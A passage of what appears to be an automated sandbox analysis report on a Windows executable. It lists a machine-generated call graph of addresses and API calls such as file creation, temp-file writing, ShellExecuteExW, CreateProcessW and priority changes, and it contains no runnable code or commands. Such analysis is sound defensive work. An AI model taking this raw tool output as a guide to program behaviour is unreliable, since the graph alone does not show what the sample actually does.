36761 1e677e 36759->36761 36760 1e675c 36760->36758 36762 1e6766 SetCurrentDirectoryW 36760->36762 36763 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 36761->36763 36762->36758 36764 1e678b 36763->36764 36764->36751 36765 1ec210 28 API calls 36777 1e6195 _wcslen ___scrt_fastfail 36765->36777 36767 1e6238 SetCurrentDirectoryW 36768 1e336e 30 API calls 36767->36768 36774 1e6236 36768->36774 36769 1e23e5 28 API calls 36769->36774 36770 1e336e 30 API calls 36770->36777 36772 1e1fed 28 API calls 36772->36777 36773 1f4370 32 API calls 36773->36774 36774->36767 36774->36769 36774->36773 36776 1e203f 28 API calls Concurrency::wait 36774->36776 36774->36777 36791 1e6504 ShellExecuteExW 36774->36791 36794 1e6550 WaitForSingleObject CloseHandle 36774->36794 36931 1e607e CreateProcessW CloseHandle ___scrt_fastfail 36774->36931 36775 1e241c 22 API calls 36775->36777 36776->36774 36777->36758 36777->36760 36777->36765 36777->36767 36777->36770 36777->36772 36777->36774 36777->36775 36784 1e3449 31 API calls 36777->36784 36785 1e6592 ShellExecuteW 36777->36785 36786 1e1f8e 28 API calls 36777->36786 36787 1e203f 28 API calls Concurrency::wait 36777->36787 36788 1faa54 31 API calls 36777->36788 36792 1e23e5 28 API calls 36777->36792 36796 1e25a8 28 API calls 36777->36796 36820 1e6d61 36777->36820 36831 1eea00 36777->36831 36871 1eefc0 36777->36871 36885 1f12c0 36777->36885 36932 1e3157 28 API calls 36777->36932 36933 1edd80 31 API calls 2 library calls 36777->36933 36934 1ec010 40 API calls 36777->36934 36935 1f4370 32 API calls 36777->36935 36936 1e3306 58 API calls 36777->36936 36937 1e47dc 28 API calls 36777->36937 36784->36777 36785->36777 36786->36777 36787->36777 36788->36777 36791->36774 36792->36777 36794->36777 36795 1e66cf MessageBoxW 36797 1e203f Concurrency::wait 28 API calls 36795->36797 36796->36777 36797->36777 36798->36748 36800 1f3588 36799->36800 36801 1f337b 36799->36801 36802 1f35bf error_info_injector 36800->36802 36805 1f3605 36800->36805 36803 1e2520 28 API calls 36801->36803 36804 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 36802->36804 36814 1f338e error_info_injector 36803->36814 36806 1f3601 36804->36806 36807 21f174 Concurrency::wait 26 API calls 36805->36807 36806->36777 36808 1f360a 36807->36808 36940 1e2330 28 API calls std::_Xinvalid_argument 36808->36940 36811 1e241c 22 API calls 36811->36814 36813 1f355e 36813->36800 36816 1f35c1 36813->36816 36817 1f3581 36813->36817 36814->36800 36814->36805 36814->36808 36814->36811 36814->36813 36815 21b1a7 22 API calls 36814->36815 36938 1e4906 28 API calls 36814->36938 36815->36814 36939 1e4906 28 API calls 36816->36939 36819 1e241c 22 API calls 36817->36819 36819->36800 36821 1e6d87 CommandLineToArgvW 36820->36821 36822 1e6d85 36820->36822 36823 1e6d98 36821->36823 36827 1e6d9c 36821->36827 36822->36821 36826 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 36823->36826 36824 1e6dcb LocalFree 36824->36823 36825 1e1fbc 28 API calls 36825->36827 36828 1e6de7 36826->36828 36827->36824 36827->36825 36830 1e203f Concurrency::wait 28 API calls 36827->36830 36941 1e47dc 28 API calls 36827->36941 36828->36777 36830->36827 36832 1e241c 22 API calls 36831->36832 36833 1eea48 36832->36833 36942 1ee680 36833->36942 36835 1eea5c 36836 1e241c 22 API calls 36835->36836 36851 1eea68 error_info_injector 36835->36851 36837 1eeab1 36836->36837 36838 1ee680 42 API calls 36837->36838 36839 1eeac2 36838->36839 36841 1ee680 42 API calls 36839->36841 36840 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 36842 1eef31 36840->36842 36843 1eeacf 36841->36843 36842->36777 36844 1ec180 28 API calls 36843->36844 36845 1eeadc 36844->36845 36846 1e2520 28 API calls 36845->36846 36870 1eecce error_info_injector BuildCatchObjectHelperInternal 36845->36870 36847 1eeb07 36846->36847 36849 1eef35 36847->36849 36857 1eeb71 36847->36857 36869 1eeb2f error_info_injector BuildCatchObjectHelperInternal 36847->36869 36848 1eee7f error_info_injector 36848->36851 36856 1eef44 36848->36856 37012 1e2330 28 API calls std::_Xinvalid_argument 36849->37012 36851->36840 36852 1eef3f 36855 21f174 Concurrency::wait 26 API calls 36852->36855 36853 1eef3a 37013 1e2330 28 API calls std::_Xinvalid_argument 36853->37013 36855->36856 36859 21f174 Concurrency::wait 26 API calls 36856->36859 36858 1eebb6 36857->36858 36860 1eebef 36857->36860 36862 21b1a7 22 API calls 36858->36862 36861 1eef49 36859->36861 36863 21b1a7 22 API calls 36860->36863 36860->36869 36862->36869 36863->36869 36864 1eed10 36865 1eed54 36864->36865 36866 1eed8d 36864->36866 36867 21b1a7 22 API calls 36865->36867 36868 21b1a7 22 API calls 36866->36868 36866->36870 36867->36870 36868->36870 36869->36852 36869->36853 36869->36864 36869->36870 36870->36848 36870->36852 36872 1eeff6 36871->36872 36879 1eefef error_info_injector 36871->36879 36873 1e241c 22 API calls 36872->36873 36874 1eefff 36873->36874 36876 1ee680 42 API calls 36874->36876 36875 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 36877 1ef0d8 36875->36877 36878 1ef013 36876->36878 36877->36777 36880 1ef05c 36878->36880 36881 1ee680 42 API calls 36878->36881 36879->36875 36880->36879 36882 1ef0dc 36880->36882 36881->36880 36883 21f174 Concurrency::wait 26 API calls 36882->36883 36884 1ef0e1 36883->36884 36886 1f1332 _wcslen 36885->36886 36887 1e8570 5 API calls 36886->36887 36888 1f1354 36887->36888 36889 1f1364 36888->36889 36895 1f14f6 36888->36895 36890 1f18d3 36889->36890 36891 1f1390 36889->36891 37018 1e3196 28 API calls 36890->37018 36894 1f18d8 36891->36894 36896 1f13ac error_info_injector BuildCatchObjectHelperInternal 36891->36896 36900 1f13d8 36891->36900 36893 1f184e 36899 1f17b0 error_info_injector 36893->36899 36904 1f18fb 36893->36904 37019 1e2330 28 API calls std::_Xinvalid_argument 36894->37019 36895->36896 36897 1f18e2 36895->36897 36915 1f158b 36895->36915 36918 1f15bc 36895->36918 36896->36893 36901 1f18ec 36896->36901 36902 1f18dd 36896->36902 36907 1f18e7 36896->36907 36912 1f18f1 36896->36912 36923 1f16c1 BuildCatchObjectHelperInternal 36896->36923 36926 1f1719 36896->36926 36927 1f174a 36896->36927 37020 1e2330 28 API calls std::_Xinvalid_argument 36897->37020 36905 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 36899->36905 36914 1f1404 36900->36914 36917 1f1435 36900->36917 37021 1e3196 28 API calls 36901->37021 36906 21f174 Concurrency::wait 26 API calls 36902->36906 36909 21f174 Concurrency::wait 26 API calls 36904->36909 36910 1f18cf 36905->36910 36906->36897 36911 21f174 Concurrency::wait 26 API calls 36907->36911 36913 1f1900 36909->36913 36910->36777 36911->36901 37022 1e2330 28 API calls std::_Xinvalid_argument 36912->37022 36920 21b1a7 22 API calls 36914->36920 36921 21b1a7 22 API calls 36915->36921 36917->36896 36925 21b1a7 22 API calls 36917->36925 36918->36896 36922 21b1a7 22 API calls 36918->36922 36919 1f18f6 36924 21f174 Concurrency::wait 26 API calls 36919->36924 36920->36896 36921->36896 36922->36896 36923->36899 36923->36919 36924->36904 36925->36896 36928 21b1a7 22 API calls 36926->36928 36927->36923 36930 21b1a7 22 API calls 36927->36930 36929 1f1734 36928->36929 36929->36902 36929->36923 36930->36923 36931->36774 36932->36777 36933->36777 36934->36777 36935->36777 36936->36777 36937->36795 36938->36814 36939->36800 36941->36827 36943 1ee6b4 36942->36943 36947 1ee6b9 36942->36947 36944 1ec2d0 40 API calls 36943->36944 36944->36947 36946 1ec210 28 API calls 36960 1ee870 36946->36960 36950 1ee6f4 36947->36950 37014 2206d0 40 API calls 36947->37014 36948 1ec210 28 API calls 36949 1ee9b9 36948->36949 36949->36835 36964 1ee757 error_info_injector 36950->36964 36965 1ee801 error_info_injector 36950->36965 37015 1ec4e0 28 API calls 36950->37015 36951 1ee9f7 37017 1e2330 28 API calls std::_Xinvalid_argument 36951->37017 36953 1ee745 36956 1e23e5 28 API calls 36953->36956 36956->36964 36957 1ee7ef 36959 1e23e5 28 API calls 36957->36959 36959->36965 36960->36951 36961 1ee8e4 36960->36961 36963 1ee91b 36960->36963 36975 1ee888 error_info_injector 36960->36975 36967 21b1a7 22 API calls 36961->36967 36968 21b1a7 22 API calls 36963->36968 36974 1ee902 36963->36974 36964->36965 36969 1ee9ed 36964->36969 37016 1ec4e0 28 API calls 36964->37016 36965->36946 36971 1ee9f2 36965->36971 36965->36975 36967->36974 36968->36974 36972 21f174 Concurrency::wait 26 API calls 36969->36972 36973 21f174 Concurrency::wait 26 API calls 36971->36973 36972->36971 36973->36951 36974->36969 36974->36975 36975->36948 36975->36949 37014->36947 37015->36953 37016->36957 37024 21b1a7 22 API calls 37023->37024 37025 1f5634 InitializeCriticalSection 37024->37025 37026 1f56af _wcslen 37025->37026 37027 1f5852 37026->37027 37030 1f56be error_info_injector BuildCatchObjectHelperInternal 37026->37030 37031 1f56f4 37026->37031 37073 1e2330 28 API calls std::_Xinvalid_argument 37027->37073 37029 1f5857 37033 21f174 Concurrency::wait 26 API calls 37029->37033 37072 1fa3c0 31 API calls 3 library calls 37030->37072 37032 1f5733 37031->37032 37036 1f5767 37031->37036 37039 21b1a7 22 API calls 37032->37039 37035 1f585c 37033->37035 37038 21f174 Concurrency::wait 26 API calls 37035->37038 37042 21b1a7 22 API calls 37036->37042 37049 1f5751 37036->37049 37037 1f57e8 37037->37035 37040 1f5818 error_info_injector 37037->37040 37041 1f5861 37038->37041 37039->37049 37040->36725 37043 1f58ba InterlockedExchangeAdd 37041->37043 37044 1f58b5 InterlockedExchangeAdd 37041->37044 37042->37049 37046 1f58cb 37043->37046 37044->37043 37045 1f58fb 37047 1f5906 SetEvent 37045->37047 37048 1f5910 37045->37048 37046->37045 37050 1f58f1 EnterCriticalSection 37046->37050 37047->37048 37051 1f5928 37048->37051 37052 1f591e LeaveCriticalSection 37048->37052 37049->37029 37049->37030 37050->37045 37053 1f5938 37051->37053 37067 1ea644 37051->37067 37052->37051 37054 1f594f EnterCriticalSection 37053->37054 37055 1f5956 37053->37055 37054->37055 37056 1e84a6 2 API calls 37055->37056 37057 1f59ba 37056->37057 37058 1f59cf 37057->37058 37059 1f59c8 LeaveCriticalSection 37057->37059 37060 1f59eb 37058->37060 37061 1f59e4 LeaveCriticalSection 37058->37061 37059->37058 37074 1e849b InterlockedExchangeAdd 37060->37074 37061->37060 37063 1f5a01 37064 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 37063->37064 37065 1f5a1b 37064->37065 37065->36725 37068 1ea64f 37067->37068 37069 1ea679 37067->37069 37075 1e7d15 37068->37075 37069->37053 37072->37037 37074->37063 37078 1e7d4c 37075->37078 37076 1e7d50 37080 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 37076->37080 37077 1e7e1a 37081 1e241c 22 API calls 37077->37081 37086 1e7e20 37077->37086 37078->37076 37078->37077 37079 1f3310 28 API calls 37078->37079 37095 1e7d94 37079->37095 37082 1e8187 PostMessageW 37080->37082 37083 1e7e3e 37081->37083 37082->37069 37084 1e7e57 37083->37084 37087 1ee680 42 API calls 37083->37087 37085 1e8476 InterlockedExchangeAdd 37084->37085 37104 1e7e61 37085->37104 37090 1e1fed 28 API calls 37086->37090 37087->37084 37090->37076 37091 1e7de3 37091->37077 37091->37086 37178 1e820c 28 API calls Concurrency::wait 37091->37178 37092 1e7e73 37183 1e849b InterlockedExchangeAdd 37092->37183 37093 1ec210 28 API calls 37093->37095 37095->37091 37095->37093 37177 1ec070 28 API calls _wcslen 37095->37177 37096 1e815f 37099 1e203f Concurrency::wait 28 API calls 37096->37099 37097 1e7fe3 error_info_injector 37182 1e82b2 28 API calls Concurrency::wait 37097->37182 37099->37086 37100 1e7fea 37101 1f5150 26 API calls 37100->37101 37101->37097 37102 1e241c 22 API calls 37102->37104 37103 1e203f Concurrency::wait 28 API calls 37103->37104 37104->37092 37104->37097 37104->37100 37104->37102 37104->37103 37105 1f5150 26 API calls 37104->37105 37107 1e825c 28 API calls 37104->37107 37108 1e7fd9 37104->37108 37179 1ebfd0 40 API calls 37104->37179 37105->37104 37107->37104 37108->37097 37109 21b1a7 22 API calls 37108->37109 37110 1e8002 37109->37110 37130 1fbc6f 37110->37130 37112 1e800a 37138 1fc28a 37112->37138 37114 1e8039 37115 1ed8b0 23 API calls 37114->37115 37116 1e805a 37115->37116 37117 1e1fbc 28 API calls 37116->37117 37118 1e8068 37117->37118 37142 1fc0ba 37118->37142 37131 1fbcb1 37130->37131 37132 1e2223 22 API calls 37131->37132 37133 1fbdcc 37132->37133 37184 1f1910 37133->37184 37135 1fbe14 37136 21b1a7 22 API calls 37135->37136 37137 1fbe4a 37136->37137 37137->37112 37139 1fc2e4 37138->37139 37187 1fe7b5 37139->37187 37143 1fc131 37142->37143 37144 1e1f8e 28 API calls 37143->37144 37145 1fc18b 37144->37145 37146 1e1f8e 28 API calls 37145->37146 37147 1fc197 37146->37147 37177->37095 37178->37091 37179->37104 37182->37092 37183->37096 37185 21b1a7 22 API calls 37184->37185 37186 1f191a InitializeCriticalSection 37185->37186 37186->37135 37188 1fe7cb 37187->37188 37189 1fe7d8 37187->37189 37188->37189 37190 1fe7d0 EnterCriticalSection 37188->37190 37191 1fe802 37189->37191 37199 1fe6e5 49 API calls 37189->37199 37190->37189 37195 1e32eb 37191->37195 37196 1e3301 37195->37196 37197 1e32f4 37195->37197 37196->37114 37197->37196 37198 1e32f9 LeaveCriticalSection 37197->37198 37198->37196 37199->37189 37332 220948 37331->37332 37333 22095c 37331->37333 37355 220a47 20 API calls __dosmaperr 37332->37355 37346 2208f2 37333->37346 37336 22094d 37356 21f164 26 API calls _abort 37336->37356 37339 220971 CreateThread 37341 22099c 37339->37341 37342 220990 GetLastError 37339->37342 37366 2207e7 37339->37366 37340 1f5c9b 37340->36738 37340->36739 37340->36740 37358 220864 37341->37358 37357 220a11 20 API calls 2 library calls 37342->37357 37345->36735 37347 2248fd __dosmaperr 20 API calls 37346->37347 37348 220902 37347->37348 37349 223185 _free 20 API calls 37348->37349 37350 22090b 37349->37350 37351 220912 GetModuleHandleExW 37350->37351 37352 22092a 37350->37352 37351->37352 37353 220864 22 API calls 37352->37353 37354 220934 37353->37354 37354->37339 37354->37341 37355->37336 37356->37340 37357->37341 37359 220871 37358->37359 37360 220895 37358->37360 37361 220880 37359->37361 37362 220877 CloseHandle 37359->37362 37360->37340 37363 220886 FreeLibrary 37361->37363 37364 22088f 37361->37364 37362->37361 37363->37364 37365 223185 _free 20 API calls 37364->37365 37365->37360 37367 2207f3 _abort 37366->37367 37368 220807 37367->37368 37369 2207fa GetLastError ExitThread 37367->37369 37383 222eda GetLastError 37368->37383 37371 22080c 37372 224768 _abort 10 API calls 37371->37372 37373 220817 37372->37373 37375 220822 37373->37375 37409 2246a7 10 API calls 2 library calls 37373->37409 37382 1f5600 132 API calls 37375->37382 37403 2115be 37375->37403 37376 22083e 37406 2209c0 37376->37406 37382->37376 37384 222ef0 37383->37384 37385 222ef6 37383->37385 37410 22445c 11 API calls 2 library calls 37384->37410 37387 2248fd __dosmaperr 20 API calls 37385->37387 37389 222f45 SetLastError 37385->37389 37388 222f08 37387->37388 37390 222f10 37388->37390 37411 2244b2 11 API calls 2 library calls 37388->37411 37389->37371 37393 223185 _free 20 API calls 37390->37393 37392 222f25 37392->37390 37395 222f2c 37392->37395 37394 222f16 37393->37394 37396 222f51 SetLastError 37394->37396 37412 222d4c 20 API calls __dosmaperr 37395->37412 37413 222a0b 38 API calls _abort 37396->37413 37398 222f37 37400 223185 _free 20 API calls 37398->37400 37402 222f3e 37400->37402 37402->37389 37402->37396 37414 2115c6 37403->37414 37405 2115c5 37405->37376 37469 22089b 37406->37469 37409->37375 37410->37385 37411->37392 37412->37398 37416 2115ee 37414->37416 37417 21163c 37414->37417 37415 211695 37418 2116a5 37415->37418 37422 2116d6 37415->37422 37416->37417 37443 210788 28 API calls BuildCatchObjectHelperInternal 37416->37443 37417->37415 37444 210788 28 API calls BuildCatchObjectHelperInternal 37417->37444 37432 21a26b 37418->37432 37439 20634d 37418->37439 37421 2117b4 37426 2117e5 37421->37426 37449 1e2261 28 API calls 3 library calls 37421->37449 37424 211742 37422->37424 37445 210525 37422->37445 37424->37421 37425 210525 28 API calls 37424->37425 37425->37424 37428 2116c9 37426->37428 37450 1e2261 28 API calls 3 library calls 37426->37450 37428->37405 37435 21a280 37432->37435 37433 21a385 37433->37428 37434 21a381 37434->37433 37437 21a217 90 API calls 37434->37437 37435->37433 37435->37434 37438 2138b1 2 API calls 37435->37438 37451 21a217 37435->37451 37437->37433 37438->37435 37440 206360 37439->37440 37441 206359 37439->37441 37459 20611f 37440->37459 37441->37428 37443->37416 37444->37417 37446 210530 37445->37446 37447 210543 37445->37447 37446->37422 37468 210928 28 API calls Concurrency::wait 37447->37468 37449->37426 37450->37428 37453 21a229 37451->37453 37455 213b11 37453->37455 37456 213b20 37455->37456 37457 213b4e 37456->37457 37458 20f30e 90 API calls 37456->37458 37457->37435 37458->37456 37460 206330 37459->37460 37461 206137 37459->37461 37460->37441 37461->37460 37462 213b11 90 API calls 37461->37462 37464 2198b5 37461->37464 37462->37461 37465 2198d8 37464->37465 37466 2198fd 37465->37466 37467 2196ed 9 API calls 37465->37467 37466->37461 37467->37466 37468->37446 37478 222f5e GetLastError 37469->37478 37471 2208aa ExitThread 37473 2208c8 37475 2208db 37473->37475 37476 2208d4 CloseHandle 37473->37476 37475->37471 37477 2208e7 FreeLibraryAndExitThread 37475->37477 37476->37475 37479 222f7d 37478->37479 37480 222f77 37478->37480 37482 2248fd __dosmaperr 17 API calls 37479->37482 37484 222fd4 SetLastError 37479->37484 37498 22445c 11 API calls 2 library calls 37480->37498 37483 222f8f 37482->37483 37491 222f97 37483->37491 37499 2244b2 11 API calls 2 library calls 37483->37499 37485 2208a6 37484->37485 37485->37471 37485->37473 37497 2246f9 10 API calls 2 library calls 37485->37497 37487 223185 _free 17 API calls 37489 222f9d 37487->37489 37488 222fac 37490 222fb3 37488->37490 37488->37491 37493 222fcb SetLastError 37489->37493 37500 222d4c 20 API calls __dosmaperr 37490->37500 37491->37487 37493->37485 37494 222fbe 37495 223185 _free 17 API calls 37494->37495 37496 222fc4 37495->37496 37496->37484 37496->37493 37497->37473 37498->37479 37499->37488 37500->37494 37502 1e6cd0 37501->37502 37512 1e6cfa 37501->37512 37503 1e6cde ShowWindow 37502->37503 37504 1e6cf1 37502->37504 37503->37504 37507 1e6100 79 API calls 37504->37507 37505 1e6d48 37506 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 37505->37506 37509 1e6d5d 37506->37509 37507->37512 37509->36439 37509->36440 37511 1e203f Concurrency::wait 28 API calls 37511->37512 37512->37505 37512->37511 37588 1e6a67 84 API calls 3 library calls 37512->37588 37589 1e47dc 28 API calls 37512->37589 37514 1eb150 ___scrt_fastfail 37513->37514 37515 1eb161 GetModuleFileNameW 37514->37515 37516 1eb180 GetEnvironmentVariableW 37515->37516 37517 1eb531 37515->37517 37516->37517 37518 1eb19b 37516->37518 37520 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 37517->37520 37590 1e3324 37518->37590 37522 1eb540 37520->37522 37522->36426 37525 1eb51b 37526 1e203f Concurrency::wait 28 API calls 37525->37526 37528 1eb526 37526->37528 37668 1f2570 35 API calls 2 library calls 37528->37668 37530 1eb510 37531 1e203f Concurrency::wait 28 API calls 37530->37531 37531->37525 37532 1eb1ee _wcslen 37532->37530 37533 1e25a8 28 API calls 37532->37533 37534 1eb23c _wcslen 37533->37534 37535 1e25a8 28 API calls 37534->37535 37536 1eb25c _wcslen 37535->37536 37537 1e25a8 28 API calls 37536->37537 37538 1eb275 _wcslen 37537->37538 37539 1e25a8 28 API calls 37538->37539 37540 1eb295 _wcslen 37539->37540 37541 1e25a8 28 API calls 37540->37541 37542 1eb2ae 37541->37542 37625 1f53a0 37542->37625 37547 1eb4fa 37667 1f5410 CloseHandle error_info_injector 37547->37667 37551 1eb505 37553 1e203f Concurrency::wait 28 API calls 37551->37553 37552 1eb4ef 37554 1eb892 28 API calls 37552->37554 37553->37530 37554->37547 37555 1eb330 WriteFile 37555->37552 37556 1eb34a 37555->37556 37556->37552 37646 1f55d0 37556->37646 37558 1eb361 ___scrt_fastfail 37558->37552 37652 1e3470 37558->37652 37561 1e23e5 28 API calls 37562 1eb3b1 37561->37562 37563 1e203f Concurrency::wait 28 API calls 37562->37563 37564 1eb3bc _wcslen 37563->37564 37565 1e25a8 28 API calls 37564->37565 37566 1eb3d5 37565->37566 37660 1e8191 37566->37660 37568 1eb418 37569 1eb438 37568->37569 37570 1eb459 ShellExecuteExW 37568->37570 37569->37570 37664 1f7c90 35 API calls 5 library calls 37569->37664 37570->37552 37571 1eb46e SetPriorityClass 37570->37571 37571->37552 37573 1eb482 GetCurrentProcess SetPriorityClass 37571->37573 37573->37552 37574 1eb494 GetCurrentThread SetThreadPriority 37573->37574 37575 1eb892 28 API calls 37574->37575 37576 1eb4b0 37575->37576 37665 1f5410 CloseHandle error_info_injector 37576->37665 37578 1eb4bb 37579 1e203f Concurrency::wait 28 API calls 37578->37579 37580 1eb4c6 37579->37580 37581 1e203f Concurrency::wait 28 API calls 37580->37581 37582 1eb4d1 37581->37582 37583 1e203f Concurrency::wait 28 API calls 37582->37583 37584 1eb4dc 37583->37584 37666 1f2570 35 API calls 2 library calls 37584->37666 37586 1eb4e7 37586->37517 37587->36429 37588->37512 37589->37512 37591 1e1fbc 28 API calls 37590->37591 37592 1e3344 37591->37592 37669 1f23b0 37592->37669 37594 1e334f 37595 1e203f Concurrency::wait 28 API calls 37594->37595 37596 1e3357 37595->37596 37597 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 37596->37597 37598 1e3364 37597->37598 37599 1f2670 37598->37599 37684 1f81f0 37599->37684 37603 1f272b 37606 1f272f 37603->37606 37744 1f7220 29 API calls 6 library calls 37603->37744 37604 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 37607 1eb1d0 37604->37607 37605 1f2804 37608 21f174 Concurrency::wait 26 API calls 37605->37608 37610 1f2809 37606->37610 37616 1f270b error_info_injector 37606->37616 37607->37525 37617 1e248d 37607->37617 37608->37610 37612 21f174 Concurrency::wait 26 API calls 37610->37612 37611 1f277c 37614 1f2810 36 API calls 37611->37614 37615 1f26d4 37611->37615 37613 1f280e 37612->37613 37614->37615 37615->37605 37615->37616 37616->37604 37618 1e24b2 _wcslen 37617->37618 37619 1e2520 28 API calls 37618->37619 37620 1e24bd 37619->37620 37621 1e258b 28 API calls 37620->37621 37622 1e24c5 _wcslen 37621->37622 37623 1e25a8 28 API calls 37622->37623 37624 1e24d9 37623->37624 37624->37532 37626 21b1a7 22 API calls 37625->37626 37627 1eb2b9 37626->37627 37628 1f5480 37627->37628 37629 1f54bb CreateFileW 37628->37629 37638 1f54b4 error_info_injector 37628->37638 37632 1f54ec 37629->37632 37629->37638 37631 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 37633 1eb2ce 37631->37633 37634 1f97a0 28 API calls 37632->37634 37633->37547 37642 1f6570 37633->37642 37635 1f551b 37634->37635 37636 1f551f CreateFileW 37635->37636 37637 1f5544 37635->37637 37636->37637 37637->37638 37639 1f55bc 37637->37639 37638->37631 37640 21f174 Concurrency::wait 26 API calls 37639->37640 37641 1f55c1 37640->37641 37643 1f65ab 37642->37643 37773 1f65e0 37643->37773 37647 1f55d9 37646->37647 37648 1f55f7 37646->37648 37649 1f55f3 37647->37649 37650 1f55e0 CloseHandle 37647->37650 37648->37558 37649->37558 37650->37648 37651 1f55eb 37650->37651 37651->37649 37653 1e3490 _wcslen 37652->37653 37654 1e2520 28 API calls 37653->37654 37655 1e34a1 _wcslen 37654->37655 37656 1e25a8 28 API calls 37655->37656 37657 1e34b1 37656->37657 37658 1e258b 28 API calls 37657->37658 37659 1e34b9 37658->37659 37659->37561 37661 1e819e 37660->37661 37662 1e84a6 2 API calls 37661->37662 37663 1e81b1 37662->37663 37663->37568 37664->37569 37665->37578 37666->37586 37667->37551 37668->37517 37670 1e241c 22 API calls 37669->37670 37671 1f2404 _wcslen 37670->37671 37672 1f242f error_info_injector BuildCatchObjectHelperInternal 37671->37672 37673 1f255f 37671->37673 37676 1f2463 37671->37676 37672->37594 37683 1e2330 28 API calls std::_Xinvalid_argument 37673->37683 37675 21f174 Concurrency::wait 26 API calls 37678 1f2569 37675->37678 37677 1f24a2 37676->37677 37679 1f24d6 37676->37679 37680 21b1a7 22 API calls 37677->37680 37681 21b1a7 22 API calls 37679->37681 37682 1f24c0 37679->37682 37680->37682 37681->37682 37682->37672 37682->37675 37685 1f8249 37684->37685 37686 1f8242 EnterCriticalSection 37684->37686 37687 1f83ba ___scrt_fastfail 37685->37687 37688 1f8260 37685->37688 37686->37685 37691 1f83cd GetTempPathW 37687->37691 37692 1f8663 37688->37692 37699 1f828c error_info_injector BuildCatchObjectHelperInternal 37688->37699 37702 1f82bc 37688->37702 37689 1f83ac LeaveCriticalSection 37690 1f83b3 37689->37690 37694 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 37690->37694 37693 1f83ee ___scrt_fastfail 37691->37693 37726 1f85e0 37691->37726 37745 1e2330 28 API calls std::_Xinvalid_argument 37692->37745 37700 1f8406 GetLongPathNameW 37693->37700 37697 1f26d0 37694->37697 37696 1f8630 LeaveCriticalSection 37696->37690 37697->37615 37727 1f2810 37697->37727 37698 1f8668 37703 21f174 Concurrency::wait 26 API calls 37698->37703 37699->37689 37699->37690 37712 1f845f _wcslen BuildCatchObjectHelperInternal 37700->37712 37715 1f842a _wcslen 37700->37715 37701 1f82fb 37707 21b1a7 22 API calls 37701->37707 37702->37701 37704 1f832f 37702->37704 37705 1f866d 37703->37705 37709 21b1a7 22 API calls 37704->37709 37714 1f8319 37704->37714 37746 1e2330 28 API calls std::_Xinvalid_argument 37705->37746 37706 1f8672 37747 21b0cd 5 API calls ___report_securityfailure 37706->37747 37707->37714 37709->37714 37711 1f8677 37748 1e2330 28 API calls std::_Xinvalid_argument 37711->37748 37712->37698 37712->37711 37717 1f85b7 37712->37717 37719 1f85eb 37712->37719 37714->37698 37714->37699 37715->37705 37715->37706 37715->37712 37720 1f84c0 37715->37720 37721 1f84f4 37715->37721 37718 21b1a7 22 API calls 37717->37718 37722 1f85d5 37718->37722 37723 21b1a7 22 API calls 37719->37723 37719->37726 37724 21b1a7 22 API calls 37720->37724 37721->37712 37725 21b1a7 22 API calls 37721->37725 37722->37698 37722->37726 37723->37726 37724->37712 37725->37712 37726->37690 37726->37696 37728 1f282f 37727->37728 37729 1f281f 37727->37729 37749 1f8680 37728->37749 37770 1f7c90 35 API calls 5 library calls 37729->37770 37732 1f2827 37732->37728 37733 1f29b2 37771 1e2330 28 API calls std::_Xinvalid_argument 37733->37771 37735 1f2841 37735->37733 37737 1f28fb 37735->37737 37738 1f292f 37735->37738 37743 1f287f error_info_injector BuildCatchObjectHelperInternal 37735->37743 37739 21b1a7 22 API calls 37737->37739 37740 21b1a7 22 API calls 37738->37740 37742 1f2919 37738->37742 37739->37742 37740->37742 37741 21f174 Concurrency::wait 26 API calls 37741->37733 37742->37741 37742->37743 37743->37603 37744->37611 37747->37711 37750 1f86b3 ___scrt_fastfail 37749->37750 37751 1f86c6 GetTempFileNameW 37750->37751 37752 1f8836 37751->37752 37755 1f86dd _wcslen 37751->37755 37753 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 37752->37753 37754 1f8849 37753->37754 37754->37735 37756 1f8850 37755->37756 37760 1f873b 37755->37760 37769 1f8702 error_info_injector BuildCatchObjectHelperInternal 37755->37769 37772 1e2330 28 API calls std::_Xinvalid_argument 37756->37772 37758 1f8855 37759 21f174 Concurrency::wait 26 API calls 37758->37759 37763 1f885a 37759->37763 37761 1f877a 37760->37761 37764 1f87ae 37760->37764 37766 21b1a7 22 API calls 37761->37766 37762 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 37765 1f882f 37762->37765 37767 21b1a7 22 API calls 37764->37767 37768 1f8798 37764->37768 37765->37735 37766->37768 37767->37768 37768->37758 37768->37769 37769->37762 37770->37732 37774 1eb2e8 37773->37774 37775 1f6624 37773->37775 37774->37552 37774->37555 37777 1f6360 30 API calls 2 library calls 37775->37777 37777->37774 37778 1f4b50 37780 1f4bce 37778->37780 37781 1f4b7c 37778->37781 37779 1f4b90 ReadFile 37779->37780 37779->37781 37782 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 37780->37782 37781->37779 37781->37780 37783 1f4bf0 37782->37783

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 583 1e51c0-1e51ea LoadLibraryW 584 1e525f-1e5263 583->584 585 1e51ec-1e5241 GetProcAddress * 6 583->585 585->584 586 1e5243-1e5246 585->586 586->584 587 1e5248-1e524b 586->587 587->584 588 1e524d-1e5250 587->588 588->584 589 1e5252-1e5255 588->589 589->584 590 1e5257-1e5259 589->590 590->584 591 1e525b 590->591 591->584
                          APIs
